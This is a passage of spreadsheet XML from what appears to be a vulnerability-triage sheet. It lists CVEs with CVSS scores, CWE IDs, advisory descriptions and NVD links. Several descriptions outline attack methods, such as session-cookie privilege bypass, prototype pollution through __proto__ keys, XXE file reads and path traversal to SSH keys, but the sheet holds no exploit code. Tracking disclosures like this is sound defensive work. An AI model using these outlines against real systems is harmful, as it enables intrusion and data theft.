      <c r="Q567" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libsoup. A malicious HTTP/2 server or a Man-in-the-Middle (MITM) attacker can exploit a heap use-after-free vulnerability in the HTTP/2 client implementation. This occurs when a GNOME application uploads a file using HTTP/2, and the server sends a GOAWAY frame while the file body is being read asynchronously. This can lead to memory corruption, potentially resulting in information disclosure or arbitrary code execution.</t>
        </is>
      </c>
      <c r="S567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85197</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92465</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr"/>
      <c r="Q568" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themeum WP Mega Menu allows Blind SQL Injection.
This issue affects WP Mega Menu: from n/a through 1.4.2.</t>
        </is>
      </c>
      <c r="S568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92465</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92616</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr"/>
      <c r="Q569" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>FileRise before version 3.28.0 contains a privilege escalation vulnerability that allows authenticated low-privilege attackers to gain unauthorized read and write access by exploiting improper session isolation between the WebDAV interface and the web application session context. Attackers can combine valid Basic-Auth credentials with an active admin PHPSESSID cookie to bypass authorization boundaries, as the WebDAV layer incorrectly inherits elevated privileges from an ambient web session rather than enforcing independent stateless authentication per RFC 4918.</t>
        </is>
      </c>
      <c r="S569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92616</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92779</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr"/>
      <c r="Q570" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>Builder.io Gen2 SDKs through versions 5.2.11 and 0.25.13 contain a prototype pollution vulnerability in the deep-set helper function that processes content block bindings without validation. Attackers can craft content blocks with binding keys containing __proto__, prototype, or constructor paths to pollute Object.prototype during rendering, affecting all subsequent objects created in the process including other tenants' renders.</t>
        </is>
      </c>
      <c r="S570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92779</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14871</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr"/>
      <c r="Q571" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4.6 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper resource allocation limits in the GraphQL complexity calculation logic.</t>
        </is>
      </c>
      <c r="S571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14871</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1168</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr"/>
      <c r="Q572" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4.6 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper resource allocation limits in the GraphQL complexity calculation logic.</t>
        </is>
      </c>
      <c r="S572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1168</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13260</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr"/>
      <c r="Q573" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access could allow a remote attacker to cause a denial of service due to insufficient validation of incoming request resources.</t>
        </is>
      </c>
      <c r="S573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13260</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15955</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr"/>
      <c r="Q574" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 could allow a remote attacker to perform an arbitrary file write due to improper validation of file paths.</t>
        </is>
      </c>
      <c r="S574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15955</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17615</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr"/>
      <c r="Q575" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in RESTEasy's SourceProvider. This vulnerability allows an unauthenticated attacker to perform an unauthenticated remote file read. By sending a specially crafted XML body with a DOCTYPE declaration referencing external entities to an endpoint that accepts application/xml and returns Source or StreamSource, the server can be tricked into resolving the entity and including sensitive file contents in the HTTP response. This is due to the SourceProvider.writeTo() method creating a SAXParser without disabling external entity resolution, leading to an XML External Entity (XXE) vulnerability.</t>
        </is>
      </c>
      <c r="S575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17615</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18212</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr"/>
      <c r="Q576" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the SAML Redirect Binding implementation of Keycloak, an open-source identity and access management solution. The issue occurs because the custom DEFLATE compression and decompression helpers fail to release native zlib memory after use. An unauthenticated attacker can exploit this by sending repeated malformed SAML requests, leading to native memory exhaustion and a denial of service.</t>
        </is>
      </c>
      <c r="S576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18212</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19290</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr"/>
      <c r="Q577" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>IBM Sterling File Gateway 6.2.0.0 through 6.2.0.6_1, 6.2.1.0 - 6.2.1.2, 6.2.2.0 - 6.2.2.1 could allow a remote attacker to obtain sensitive information due to improper access control.</t>
        </is>
      </c>
      <c r="S577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19290</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19534</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr"/>
      <c r="Q578" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-252</t>
        </is>
      </c>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>undici's WebSocket client crashes the whole Node.js process during the opening handshake when a server responds with a subprotocol that the client never requested. A default WebSocket connection sends no subprotocol, but if the server's 101 response includes a Sec-WebSocket-Protocol header, undici dereferences a null value while checking it against the requested list and throws an uncaught TypeError. Because that code runs inside a microtask with no surrounding error handling, the exception propagates and terminates the process under Node's default behavior, instead of gracefully failing the connection as required by the WebSocket protocol. Any application that opens a WebSocket to an attacker-controlled or compromised server, or over a plaintext connection subject to a machine-in-the-middle, can be crashed remotely without authentication in the default configuration. This affects undici versions from 6.7.0 up to 6.28.1, from 7.0.0 up to 7.29.1, and from 8.0.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="S578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19534</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19666</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr"/>
      <c r="Q579" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>On a resolver configured to use ``dns64``, if an applicable answer from the authoritative server is malformed in a specific way, the resolver `named` process will exit unexpectedly.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19666</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19667</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr"/>
      <c r="Q580" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>If an attacker-controlled authoritative server can produce a negative answer that is exactly 65536 bytes, then a flaw in `named` results in a negative cache entry of 0 bytes. When this entry is subsequently read, `named` aborts.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19667</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20247</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr"/>
      <c r="Q581" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an unauthenticated, remote attacker to conduct SQL injection attacks on an affected device.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to modify data in the underlying database.</t>
        </is>
      </c>
      <c r="S581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20247</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20343</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr"/>
      <c r="Q582" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in a critical API for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to download sensitive files and use unbounded disk space.
This vulnerability exists because a critical API lacks authentication.&amp;nbsp;An attacker could exploit this vulnerability by repeatedly invoking the API. A successful exploit could allow the attacker to download sensitive files that should be restricted and consume disk space so the device could become unresponsive, causing a DoS condition.</t>
        </is>
      </c>
      <c r="S582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20343</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27557</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr"/>
      <c r="Q583" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can exploit a path traversal vulnerability in the /index.php/view_uploaded_iodd_file endpoint allowing the SSH server's private keys to be read.</t>
        </is>
      </c>
      <c r="S583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27557</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28935</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
